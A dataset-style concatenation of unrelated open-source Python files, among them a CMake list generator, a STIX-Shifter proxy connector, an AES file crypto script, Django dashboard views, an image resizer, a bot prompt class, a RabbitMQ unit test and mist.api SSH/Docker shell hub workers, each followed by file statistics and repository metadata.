if verbose: print(" Located {0} source file '{1}'".format(mod,short_root+name))
srcs+=[short_root+name]
# Retrieve the list of module header files.
headers = []
for root,dirs,files in os.walk("./"+mod+"/include"):
current_dirname = os.path.basename(os.path.normpath(root))
if mod=="Printers" and excluded(current_dirname, exclude_printers):
if verbose: print(" Ignoring header files for printer {0}".format(current_dirname))
excluded_components.add(current_dirname)
continue # skip this directory
for name in files:
short_root = re.sub("\\./"+mod+"/include/?","",root)
if short_root != "" : short_root += "/"
if mod in ["Backends", "Models", "Printers"] and "/backend_types/" not in short_root and excluded(name, exclude_backends | exclude_models | exclude_printers):
if verbose: print(" Ignoring {0} header file '{1}'".format(mod,short_root+name))
excluded_components.add(os.path.splitext(name)[0])
continue # skip this file
if (name.endswith(".h") or name.endswith(".hh") or name.endswith(".hpp")) and not hidden(name):
if verbose: print(" Located {0} header file '{1}'".format(mod,short_root+name))
headers+=[short_root+name]
# Make a candidate CMakeLists.txt file for this module.
towrite = "\
# GAMBIT: Global and Modular BSM Inference Tool \n\
#***********************************************\n\
# \\file \n\
# \n\
# CMake list of source and header files in \n"
if (mod == "Backends"):
towrite += "\
# GAMBIT backends directory. \n"
elif (mod == "Printers"):
towrite += "\
# GAMBIT printers directory. \n"
elif (mod == "Models"):
towrite += "\
# GAMBIT models directory. \n"
else:
towrite += "\
# GAMBIT module "+mod+". \n"
towrite += "\
# \n\
# This file was automatically generated by \n\
# update_cmakelists.py. Do not modify. \n\
# \n\
# Do not add to this if you want to add a new \n\
# source or header file to the make system -- \n\
# just rerun cmake instead. \n\
# \n\
#***********************************************\n\
# \n\
# Authors: \n\
# \n\
# \\author The GAMBIT Collaboration \n\
# \\date "+datetime.datetime.now().strftime("%I:%M%p on %B %d, %Y")+"\n\
# \n\
#***********************************************\n\
\n"
if (mod == "Backends"):
towrite += "\
include(../cmake/toy_backends.cmake) \n\n"
towrite += "\
set(source_files \n"
for cpp in srcs: towrite+='src/{0}\n'.format(cpp)
towrite+=")\n\nset(header_files\n"
for hpp in headers: towrite+='include/{0}\n'.format(hpp)
towrite+=")\n\n"
towrite+="add_gambit_library("+mod+" OPTION OBJECT SOURCES ${source_files} HEADERS ${header_files})"
cmakelist = "./"+mod+"/CMakeLists.txt"
candidate = "./scratch/"+mod+"_CMakeLists.txt"
with open(candidate,"w") as f: f.write(towrite)
update_only_if_different(cmakelist, candidate)
if verbose: print("Finished updating module CMakeLists.txt files.")
# Handle command line arguments (verbosity)
if __name__ == "__main__":
main(sys.argv[1:])
| 43.963351 | 174 | 0.532571 | 921 | 8,397 | 4.779587 | 0.266015 | 0.028623 | 0.025443 | 0.019991 | 0.337119 | 0.280781 | 0.272376 | 0.236483 | 0.214902 | 0.172649 | 0 | 0.005708 | 0.31154 | 8,397 | 190 | 175 | 44.194737 | 0.755752 | 0.179231 | 0 | 0.251908 | 0 | 0.007634 | 0.155341 | 0.021774 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022901 | false | 0 | 0.007634 | 0.007634 | 0.045802 | 0.145038 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91f196b52160cce750e31578f03349f95ed88a03 | 2,262 | py | Python | stix_shifter/stix_transmission/src/modules/proxy/proxy_connector.py | Gehard/STIX-Shifter | 5f7917c244fbd10cac528dba6924eaef203dceee | [
"Apache-2.0"
] | null | null | null | stix_shifter/stix_transmission/src/modules/proxy/proxy_connector.py | Gehard/STIX-Shifter | 5f7917c244fbd10cac528dba6924eaef203dceee | [
"Apache-2.0"
] | null | null | null | stix_shifter/stix_transmission/src/modules/proxy/proxy_connector.py | Gehard/STIX-Shifter | 5f7917c244fbd10cac528dba6924eaef203dceee | [
"Apache-2.0"
] | 1 | 2020-10-19T18:19:02.000Z | 2020-10-19T18:19:02.000Z | from ..base.base_connector import BaseConnector
import json
import requests
class Connector(BaseConnector):
def __init__(self, connection, configuration):
self.is_async = True
self.connection = connection
self.configuration = configuration
self.results_connector = self
self.status_connector = self
self.delete_connector = self
self.query_connector = self
self.ping_connector = self
def ping(self):
response = requests.post("http://" + self.connection["proxy_host"] + ":" + self.connection["proxy_port"] + "/ping",
data=json.dumps({"connection": self.connection, "configuration": self.configuration}))
return response.text
def create_query_connection(self, query):
response = requests.post("http://" + self.connection["proxy_host"] + ":" + self.connection["proxy_port"] + "/create_query_connection",
data=json.dumps({"connection": self.connection, "configuration": self.configuration, "query": query}))
return response.text
def create_results_connection(self, search_id, offset, length):
response = requests.post("http://" + self.connection["proxy_host"] + ":" + self.connection["proxy_port"] + "/create_results_connection",
data=json.dumps({"connection": self.connection, "configuration": self.configuration, "search_id": search_id, "offset": offset, "length": length}))
return response.text
def create_status_connection(self, search_id):
response = requests.get("http://" + self.connection["proxy_host"] + ":" + self.connection["proxy_port"] + "/create_status_connection",
data=json.dumps({"connection": self.connection, "configuration": self.configuration, "search_id": search_id}))
return response.text
def delete_query_connection(self, search_id):
response = requests.post("http://" + self.connection["proxy_host"] + ":" + self.connection["proxy_port"] + "/delete_query_connection",
data=json.dumps({"connection": self.connection, "configuration": self.configuration, "search_id": search_id}))
return response.text
| 51.409091 | 179 | 0.648541 | 231 | 2,262 | 6.151515 | 0.160173 | 0.167488 | 0.133709 | 0.130894 | 0.674173 | 0.617171 | 0.574947 | 0.574947 | 0.574947 | 0.527797 | 0 | 0 | 0.217949 | 2,262 | 43 | 180 | 52.604651 | 0.803279 | 0 | 0 | 0.212121 | 0 | 0 | 0.178161 | 0.043767 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.090909 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91f2c2f16d86313bb08782a9e75430ca0c4a6c6a | 1,687 | py | Python | scripts/cryptoConfig.py | lujun495904500/CocosGame | ca7f98a5319090c3c504c4916ae189db74a1983a | [
"MIT"
] | 14 | 2019-09-05T09:21:41.000Z | 2022-03-09T03:33:19.000Z | scripts/cryptoConfig.py | tinge666/CocosGame | ca7f98a5319090c3c504c4916ae189db74a1983a | [
"MIT"
] | null | null | null | scripts/cryptoConfig.py | tinge666/CocosGame | ca7f98a5319090c3c504c4916ae189db74a1983a | [
"MIT"
] | 7 | 2019-10-11T03:11:05.000Z | 2021-07-06T08:20:15.000Z | # -*- coding: utf-8 -*-
import sys,getopt,os,re
from enum import Enum
from toolkits import tools
REG_DEC_NAME = re.compile(r'(.+)_dec')
def get_configaes():
config = tools.get_scriptconfig()
return config["aes"]["keys"][config["aes"]["confindex"]]
#解密文件
def crypto_file(opertype,infile,outfile):
confaes = get_configaes()
if opertype == "E":
tools.encrypto_aes(confaes["key"],confaes["iv"],infile,outfile)
elif opertype == "D":
tools.decrypto_aes(confaes["key"],confaes["iv"],infile,outfile)
# 操作加密解密
def do_crypto(opertype,infile,outfile,*args):
if infile == None and len(args)>0:
infile = args[0]
if infile == None:
print('未识别加密或解密文件!!!')
sys.exit(3)
# 分析输入文件路径
findir,finname = os.path.split(infile)
finmain,finext = os.path.splitext(finname)
# 判断文件操作类型
if opertype == "U":
if REG_DEC_NAME.match(finmain):
opertype = "E"
else:
opertype = "D"
# 判断输出文件路径
if outfile == None:
mpair = REG_DEC_NAME.match(finmain)
if mpair:
outfile = os.path.join(findir,mpair.group(1)+finext)
else:
outfile = os.path.join(findir,finmain+'_dec'+finext)
# 执行加密解密文件
crypto_file(opertype,infile,outfile)
# 执行函数
if __name__== '__main__' :
opertype = "U"
infile = None
outfile = None
# 解析命令行
try:
opts, args = getopt.getopt(sys.argv[1:], "i:o:ed", ["infile=","outfile=","encode","decode"])
except getopt.GetoptError as err:
print(err)
sys.exit(1)
for o, a in opts:
if o in ("-i", "--infile"):
infile = a
elif o in ("-o", "--outfile"):
outfile = a
elif o in ("-e", "--encode"):
opertype = "E"
elif o in ("-d", "--decode"):
opertype = "D"
# 执行命令
do_crypto(opertype,infile,outfile,*args)
#os.system('pause')
| 21.909091 | 94 | 0.652045 | 240 | 1,687 | 4.479167 | 0.379167 | 0.084651 | 0.07814 | 0.044651 | 0.267907 | 0.126512 | 0.065116 | 0 | 0 | 0 | 0 | 0.004979 | 0.166568 | 1,687 | 76 | 95 | 22.197368 | 0.759602 | 0.060462 | 0 | 0.115385 | 0 | 0 | 0.091545 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057692 | false | 0 | 0.057692 | 0 | 0.134615 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91f3a603abff4ff065bd92786506d156a661da0c | 6,409 | py | Python | main/views.py | MPIB/Lagerregal | 3c950dffcf4fa164008c5a304c4839bc282a3388 | [
"BSD-3-Clause"
] | 24 | 2017-03-19T16:17:37.000Z | 2021-11-07T15:35:33.000Z | main/views.py | MPIB/Lagerregal | 3c950dffcf4fa164008c5a304c4839bc282a3388 | [
"BSD-3-Clause"
] | 117 | 2016-04-19T12:35:10.000Z | 2022-02-22T13:19:05.000Z | main/views.py | MPIB/Lagerregal | 3c950dffcf4fa164008c5a304c4839bc282a3388 | [
"BSD-3-Clause"
] | 11 | 2017-08-08T12:11:39.000Z | 2021-12-08T05:34:06.000Z | import datetime
from django.db.models import Q
from django.shortcuts import redirect
from django.utils.translation import ugettext_lazy as _
from django.views.generic import TemplateView
from reversion.models import Revision
from devicegroups.models import Devicegroup
from devices.forms import LendForm
from devices.models import Device
from devices.models import Lending
from locations.models import Section
from main.models import WIDGETS
from main.models import DashboardWidget
from main.models import get_progresscolor
from network.models import IpAddress
from users.models import Lageruser
def get_widget_data(user, widgetlist=[], only_user=False):
context = {}
context["today"] = datetime.date.today()
departments = None
if only_user:
departments = user.departments.all()
if "statistics" in widgetlist:
if departments:
devices = Device.active().filter(department__in=departments)
else:
devices = Device.active()
context['device_all'] = devices.count()
if context['device_all'] != 0:
context['device_available'] = Device.active().filter(currentlending=None).count()
context["device_percent"] = 100 - int(
float(context["device_available"]) / context["device_all"] * 100
)
context["device_percentcolor"] = get_progresscolor(context["device_percent"])
context['ipaddress_all'] = IpAddress.objects.all().count()
if context['ipaddress_all'] != 0:
context['ipaddress_available'] = IpAddress.objects.filter(device=None).count()
context["ipaddress_percent"] = 100 - int(
float(context["ipaddress_available"]) / context["ipaddress_all"] * 100
)
context["ipaddress_percentcolor"] = get_progresscolor(context["ipaddress_percent"])
if "edithistory" in widgetlist:
if only_user:
revisions = Revision.objects.filter(user=user)
else:
revisions = Revision.objects.all()
context['revisions'] = (
revisions
.select_related('user')
.prefetch_related('version_set', 'version_set__content_type')
.order_by("-date_created")[:20]
)
if "newestdevices" in widgetlist:
if departments:
devices = Device.objects.filter(department__in=departments)
else:
devices = Device.objects.all()
context['newest_devices'] = devices.order_by("-pk")[:10]
if "overdue" in widgetlist:
if departments:
lendings = Lending.objects.select_related("device", "owner").filter(
Q(device__department__in=departments) | Q(owner__main_department__in=departments)
)
else:
lendings = Lending.objects.select_related("device", "owner")
context["overdue"] = lendings.filter(duedate__lt=context["today"], returndate=None).order_by("duedate")[:10]
if "groups" in widgetlist:
context["groups"] = Devicegroup.objects.all()
if "sections" in widgetlist:
context["sections"] = Section.objects.all()
if "recentlendings" in widgetlist:
if departments:
lendings = Lending.objects.select_related("device", "owner").filter(
Q(device__department__in=departments) | Q(owner__main_department__in=departments)
)
else:
lendings = Lending.objects.select_related("device", "owner")
context["recentlendings"] = lendings.all().order_by("-pk")[:10]
if "shorttermdevices" in widgetlist:
context['shorttermdevices'] = Device.objects.filter(templending=True)[:10]
if "bookmarks" in widgetlist:
context["bookmarks"] = user.bookmarks.all()[:10]
if "returnsoon" in widgetlist:
soon = context["today"] + datetime.timedelta(days=10)
if departments:
lendings = Lending.objects.select_related("device", "owner").filter(
Q(device__department__in=departments) | Q(owner__main_department__in=departments)
)
else:
lendings = Lending.objects.select_related("device", "owner")
context["returnsoon"] = lendings.filter(
duedate__lte=soon,
duedate__gt=context["today"],
returndate=None
).order_by("duedate")[:10]
return context
class Home(TemplateView):
template_name = "home.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
if self.request.user.is_staff:
context["widgets_left"] = DashboardWidget.objects.filter(user=self.request.user, column="l").order_by("index")
context["widgets_right"] = DashboardWidget.objects.filter(user=self.request.user, column="r").order_by("index")
userwidget_list = dict(WIDGETS)
widgetlist = [x[0] for x in DashboardWidget.objects.filter(user=self.request.user).values_list("widgetname")]
context.update(get_widget_data(self.request.user, widgetlist, only_user=True))
for w in context["widgets_left"]:
if w.widgetname in userwidget_list:
del userwidget_list[w.widgetname]
else:
w.delete()
for w in context["widgets_right"]:
if w.widgetname in userwidget_list:
del userwidget_list[w.widgetname]
else:
w.delete()
context["widgets_list"] = userwidget_list
context["lendform"] = LendForm()
context["lendform"].fields["device"].choices = [
[device[0], str(device[0]) + " - " + device[1]] for device in (
Device
.devices_for_departments(self.request.user.departments.all())
.filter(trashed=None, currentlending=None, archived=None)
.values_list('id', 'name')
)
]
context["lendform"].fields["device"].choices.insert(0, ["", "---------"])
context["userlist"] = Lageruser.objects.filter(is_active=True).values(
"pk", "username", "first_name", "last_name")
context["breadcrumbs"] = [("", _("Dashboard"))]
else:
if self.request.user.is_authenticated:
redirect("userprofile")
return context
| 43.598639 | 123 | 0.62303 | 662 | 6,409 | 5.859517 | 0.223565 | 0.034029 | 0.047435 | 0.04331 | 0.345965 | 0.288734 | 0.269142 | 0.233308 | 0.184326 | 0.184326 | 0 | 0.00735 | 0.256982 | 6,409 | 146 | 124 | 43.89726 | 0.807224 | 0 | 0 | 0.246269 | 0 | 0 | 0.126853 | 0.007333 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014925 | false | 0 | 0.119403 | 0 | 0.164179 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91f51c9fc3d3f7af3c6e3bb4e74a7006b381b69f | 744 | py | Python | resize.py | Andrewzekid/Image_resizer | e9834f960241f96513a77f5ed65b975da3b06099 | [
"MIT"
] | null | null | null | resize.py | Andrewzekid/Image_resizer | e9834f960241f96513a77f5ed65b975da3b06099 | [
"MIT"
] | null | null | null | resize.py | Andrewzekid/Image_resizer | e9834f960241f96513a77f5ed65b975da3b06099 | [
"MIT"
] | null | null | null | import cv2 as cv
import PIL
import pathlib
basepath = pathlib.Path(".")
image_files = basepath.glob("*.jpg")
for image in image_files:
img = cv.imread(str(image), cv.IMREAD_UNCHANGED)
print('Original Dimensions : ',img.shape)
scale_percent = 50 # percent of original size
width = int(img.shape[1] * scale_percent / 100)
height = int(img.shape[0] * scale_percent / 100)
dim = (width, height)
# resize image
resized = cv.resize(img, dim, interpolation = cv.INTER_AREA)
print('Resized Dimensions : ',resized.shape)
cv.imshow("Resized image", resized)
cv.waitKey(0)
cv.imwrite(str(image)[:-4] + "_resized_50.jpg",resized)
cv.destroyAllWindows() | 28.615385 | 65 | 0.634409 | 95 | 744 | 4.873684 | 0.463158 | 0.051836 | 0.047516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026455 | 0.237903 | 744 | 26 | 66 | 28.615385 | 0.790123 | 0.049731 | 0 | 0 | 0 | 0 | 0.113235 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91f5f6684a2b68cc98dc49e32e0abfeb4df28f28 | 1,621 | py | Python | libraries/botbuilder-dialogs/botbuilder/dialogs/prompts/text_prompt.py | Fl4v/botbuilder-python | 4003d713beb8fb986a01cfd11632eabc65858618 | [
"MIT"
] | 388 | 2019-05-07T15:53:21.000Z | 2022-03-28T20:29:46.000Z | libraries/botbuilder-dialogs/botbuilder/dialogs/prompts/text_prompt.py | Fl4v/botbuilder-python | 4003d713beb8fb986a01cfd11632eabc65858618 | [
"MIT"
] | 1,286 | 2019-05-07T23:38:19.000Z | 2022-03-31T10:44:16.000Z | libraries/botbuilder-dialogs/botbuilder/dialogs/prompts/text_prompt.py | Fl4v/botbuilder-python | 4003d713beb8fb986a01cfd11632eabc65858618 | [
"MIT"
] | 168 | 2019-05-14T20:23:25.000Z | 2022-03-16T06:49:14.000Z | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from typing import Dict
from botbuilder.core import TurnContext
from botbuilder.schema import ActivityTypes
from .prompt import Prompt
from .prompt_options import PromptOptions
from .prompt_recognizer_result import PromptRecognizerResult
class TextPrompt(Prompt):
async def on_prompt(
self,
turn_context: TurnContext,
state: Dict[str, object],
options: PromptOptions,
is_retry: bool,
):
if not turn_context:
raise TypeError("TextPrompt.on_prompt(): turn_context cannot be None.")
if not options:
raise TypeError("TextPrompt.on_prompt(): options cannot be None.")
if is_retry and options.retry_prompt is not None:
await turn_context.send_activity(options.retry_prompt)
else:
if options.prompt is not None:
await turn_context.send_activity(options.prompt)
async def on_recognize(
self,
turn_context: TurnContext,
state: Dict[str, object],
options: PromptOptions,
) -> PromptRecognizerResult:
if not turn_context:
raise TypeError(
"DateTimePrompt.on_recognize(): turn_context cannot be None."
)
result = PromptRecognizerResult()
if turn_context.activity.type == ActivityTypes.message:
message = turn_context.activity
if message.text is not None:
result.succeeded = True
result.value = message.text
return result
| 33.081633 | 83 | 0.653917 | 176 | 1,621 | 5.886364 | 0.352273 | 0.106178 | 0.034749 | 0.030888 | 0.370656 | 0.277992 | 0.220077 | 0.220077 | 0.220077 | 0.220077 | 0 | 0 | 0.280691 | 1,621 | 48 | 84 | 33.770833 | 0.888508 | 0.054904 | 0 | 0.25 | 0 | 0 | 0.103336 | 0.049706 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.15 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91fa57cad2a22e798ce52adb1551a2a820b1ee04 | 2,303 | py | Python | test/unit/rabbitmq_class/rabbitmqcon_ack.py | deepcoder42/rabbitmq-lib | d4221cac7d4e763626b06f22a7320af9847ced13 | [
"MIT"
] | null | null | null | test/unit/rabbitmq_class/rabbitmqcon_ack.py | deepcoder42/rabbitmq-lib | d4221cac7d4e763626b06f22a7320af9847ced13 | [
"MIT"
] | null | null | null | test/unit/rabbitmq_class/rabbitmqcon_ack.py | deepcoder42/rabbitmq-lib | d4221cac7d4e763626b06f22a7320af9847ced13 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# Classification (U)
"""Program: rabbitmqcon_ack.py
Description: Unit test of rabbitmqcon.ack in rabbitmq_class.py.
Usage:
test/unit/rabbitmq_class/rabbitmqcon_ack.py
Arguments:
"""
# Libraries and Global Variables
# Standard
import sys
import os
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
# Third-party
import mock
# Local
sys.path.append(os.getcwd())
import rabbitmq_class
import version
__version__ = version.__version__
class Ack(object):
"""Class: Ack
Description: Class stub holder for pika class.
Methods:
__init__
queue_unbind
"""
def __init__(self):
"""Function: __init__
Description: Stub holder for __init__ function.
Arguments:
"""
self.delivery_tag = None
def basic_ack(self, delivery_tag):
"""Function: basic_ack
Description: Stub holder for basic_ack function.
Arguments:
delivery_tag
"""
self.delivery_tag = delivery_tag
return True
class UnitTest(unittest.TestCase):
"""Class: UnitTest
Description: Class which is a representation of a unit testing.
Methods:
setUp
test_ack
"""
def setUp(self):
"""Function: setUp
Description: Initialization for unit testing.
Arguments:
"""
self.name = None
self.host = "ServerName"
self.port = 5555
self.connection = None
self.exchange_name = "Exchange_Name"
self.queue_name = "Queue_Name"
self.routing_key = "Route_Key"
self.auto_delete = True
self.body = "Message_Body"
@mock.patch("rabbitmq_class.pika")
def test_ack(self, mock_pika):
"""Function: test_ack
Description: Test ack method.
Arguments:
"""
mock_pika.PlainCredentials.return_value = "PlainCredentials"
mock_pika.ConnectionParameters.return_value = "ConnectionParameters"
mock_pika.BasicProperties.return_value = True
rmq = rabbitmq_class.RabbitMQCon(self.name, "xxxxx")
rmq.channel = Ack()
self.assertFalse(rmq.ack("tag"))
if __name__ == "__main__":
unittest.main()
| 17.580153 | 76 | 0.623969 | 249 | 2,303 | 5.502008 | 0.373494 | 0.047445 | 0.028467 | 0.035037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004255 | 0.285714 | 2,303 | 130 | 77 | 17.715385 | 0.828571 | 0.34607 | 0 | 0 | 0 | 0 | 0.096824 | 0 | 0 | 0 | 0 | 0 | 0.026316 | 1 | 0.105263 | false | 0 | 0.184211 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
91fae303e69fe17c6a7e39236d3b31298320aa3c | 10,693 | py | Python | src/mist/api/hub/shell.py | SpiralUp/mist.api | a3b5233ab4aa3f6a0a2dea6333ff1e5a260af934 | [
"Apache-2.0"
] | 6 | 2017-08-24T00:34:30.000Z | 2022-01-16T21:29:22.000Z | src/mist/api/hub/shell.py | SpiralUp/mist.api | a3b5233ab4aa3f6a0a2dea6333ff1e5a260af934 | [
"Apache-2.0"
] | 9 | 2021-03-31T18:50:47.000Z | 2022-01-09T23:20:02.000Z | src/mist/api/hub/shell.py | SpiralUp/mist.api | a3b5233ab4aa3f6a0a2dea6333ff1e5a260af934 | [
"Apache-2.0"
] | 13 | 2017-09-21T18:17:02.000Z | 2022-02-21T04:29:25.000Z | import sys
import time
import logging
import gevent
import gevent.socket
import mist.api.exceptions
import mist.api.shell
import mist.api.hub.main
import mist.api.users.models
import mist.api.logs.methods
from mist.api.misc.shell import ShellCapture
from mist.api import config
log = logging.getLogger(__name__)
class ShellHubWorker(mist.api.hub.main.HubWorker):
def __init__(self, *args, **kwargs):
super(ShellHubWorker, self).__init__(*args, **kwargs)
self.shell = None
self.channel = None
for key in ('owner_id', 'cloud_id', 'machine_id', 'host',
'columns', 'rows'):
# HACK:FIXME: Temporary fix for Orchestration shell.
# Add a new, dedicated ShellHubWorker for Orchestration logs.
if key in ('host', 'cloud_id', 'machine_id', ):
if self.params.get('job_id'):
continue
if not self.params.get(key):
err = "%s: Param '%s' missing from worker kwargs." % (self.lbl,
key)
log.error(err)
self.stop()
raise Exception(err)
self.provider = ''
self.owner = mist.api.users.models.Owner(id=self.params['owner_id'])
def on_ready(self, body='', msg=''):
super(ShellHubWorker, self).on_ready(body, msg)
self.connect()
def connect(self):
"""Connect to shell"""
if self.shell is not None:
log.error("%s: Can't call on_connect twice.", self.lbl)
return
data = self.params
self.provider = data.get('provider', '')
host = data.get('host', '')
cloud_id = data.get('cloud_id', '')
machine_id = data.get('machine_id', '')
job_id = data.get('job_id', '')
cols = data["columns"]
rows = data["rows"]
try:
self.shell = mist.api.shell.Shell(host, provider=self.provider)
key_id, ssh_user = self.shell.autoconfigure(owner=self.owner,
cloud_id=cloud_id,
machine_id=machine_id,
job_id=job_id,
cols=cols,
rows=rows)
self.params.update(key_id=key_id, ssh_user=ssh_user)
except Exception as exc:
if self.provider == 'docker':
self.shell = mist.api.shell.Shell(data['host'],
provider='docker')
key_id, ssh_user = self.shell.autoconfigure(
self.owner, data['cloud_id'], data['machine_id'],
job_id=data['job_id'],
)
elif self.provider == "kubevirt":
self.shell = mist.api.shell.Shell(data['host'],
provider='kubevirt')
key_id, ssh_user = self.shell.autoconfigure(
self.owner, data['cloud_id'], data['machine_id']
)
else:
self.shell = mist.api.shell.Shell(data['host'])
key_id, ssh_user = self.shell.autoconfigure(
self.owner, data['cloud_id'], data['machine_id']
)
except Exception as exc:
log.warning("%s: Couldn't connect with SSH, error %r.",
self.lbl, exc)
if isinstance(exc, mist.api.exceptions.MachineUnauthorizedError):
err = 'Permission denied (publickey).'
else:
err = str(exc)
self.emit_shell_data(err)
self.params['error'] = err
self.stop()
return
self.channel = self.shell.invoke_shell('xterm',
data['columns'], data['rows'])
self.greenlets['read_stdout'] = gevent.spawn(self.get_ssh_data)
def on_data(self, body, msg):
"""Received data that must be forwarded to shell's stdin"""
if self.provider == 'kubevirt':
self.shell.send(body)
# TODO: Factory should be moved from here
elif self.shell.get_type() == "ParamikoShell" or \
self.shell.get_type() == "DockerShell":
self.channel.send(body.encode('utf-8', 'ignore'))
elif self.shell.get_type() == "LXDShell":
self.channel.send(bytearray(body, encoding='utf-8'), opcode=2)
def on_resize(self, body, msg):
"""Received resize shell window command"""
if isinstance(body, dict):
if 'columns' in body and 'rows' in body:
columns, rows = body['columns'], body['rows']
log.info("%s: Resizing shell to (%s, %s).",
self.lbl, columns, rows)
try:
if self.provider == 'kubevirt':
self.shell._shell.resize(columns, rows)
elif self.shell.get_type() == "LXDShell":
# also pass the channel to emulate how things
# were done in the past
columns, rows = self.shell.resize(columns=columns,
rows=rows)
else:
self.channel.resize_pty(columns, rows)
return columns, rows
except Exception as exc:
log.warning("%s: Error resizing shell to (%s, %s): %r.",
self.lbl, columns, rows, exc)
def emit_shell_data(self, data):
self.send_to_client('data', data)
def get_ssh_data(self):
try:
if self.provider == 'docker':
try:
self.channel.send('\n')
except:
pass
while True:
gevent.socket.wait_read(self.channel.fileno())
try:
data = self.channel.recv(1024).decode('utf-8', 'ignore')
except TypeError:
data = self.channel.recv().decode('utf-8', 'ignore')
if not len(data):
return
self.emit_shell_data(data)
finally:
self.channel.close()
def stop(self):
super(ShellHubWorker, self).stop()
if self.channel is not None:
self.channel.close()
self.channel = None
if self.shell is not None:
self.shell.disconnect()
self.shell = None
class LoggingShellHubWorker(ShellHubWorker):
def __init__(self, *args, **kwargs):
super(LoggingShellHubWorker, self).__init__(*args, **kwargs)
self.capture = []
self.capture_started_at = 0
self.stopped = False
def on_ready(self, body='', msg=''):
super(LoggingShellHubWorker, self).on_ready(body, msg)
# Don't log cfy container log views
if (
self.params.get('provider') != 'docker' or
not self.params.get('job_id')
):
mist.api.logs.methods.log_event(action='open', event_type='shell',
shell_id=self.uuid, **self.params)
def emit_shell_data(self, data):
self.capture.append((time.time(), 'data', data))
super(LoggingShellHubWorker, self).emit_shell_data(data)
def on_resize(self, body, msg):
res = super(LoggingShellHubWorker, self).on_resize(body, msg)
if res:
self.capture.append((time.time(), 'resize', res))
def stop(self):
if self.shell and not self.stopped:
# if not self.shell then namespace initialized
# but shell_open has happened
if config.ENABLE_SHELL_CAPTURE:
if self.capture:
# save captured data
capture = ShellCapture()
capture.owner = mist.api.users.models.Owner(
id=self.params['owner_id']
)
capture.capture_id = self.uuid
capture.cloud_id = self.params['cloud_id']
capture.machine_id = self.params['machine_id']
capture.key_id = self.params.get('key_id')
capture.host = self.params['host']
capture.ssh_user = self.params.get('ssh_user')
capture.started_at = self.capture_started_at
capture.finished_at = time.time()
capture.columns = self.params['columns']
capture.rows = self.params['rows']
capture.capture = [(tstamp - self.capture[0][0],
event, data)
for tstamp, event, data in self.capture]
capture.save()
# Don't log cfy container log views
if (
self.params.get('provider') != 'docker' or
not self.params.get('job_id')
):
mist.api.logs.methods.log_event(action='close',
event_type='shell',
shell_id=self.uuid,
**self.params)
super(LoggingShellHubWorker, self).stop()
class ShellHubClient(mist.api.hub.main.HubClient):
def __init__(self, *args, **kwargs):
super(ShellHubClient, self).__init__(*args, worker_type='shell',
**kwargs)
def start(self):
"""Call super and also start stdin reader greenlet"""
super(ShellHubClient, self).start()
gevent.sleep(1)
self.greenlets['stdin'] = gevent.spawn(self.send_stdin)
def send_stdin(self):
"""Continuously read lines from stdin and send them to worker"""
while True:
gevent.socket.wait_read(sys.stdin.fileno())
self.send_data(sys.stdin.readline())
gevent.sleep(0)
def send_data(self, data):
self.send_to_worker('data', data)
def resize(self, columns, rows):
self.send_to_worker('rezize', {'columns': columns, 'rows': rows})
def on_data(self, body, msg):
print(body)
def stop(self):
self.send_close()
super(ShellHubClient, self).stop()
if __name__ == "__main__":
mist.api.hub.main.main(workers={'shell': LoggingShellHubWorker})
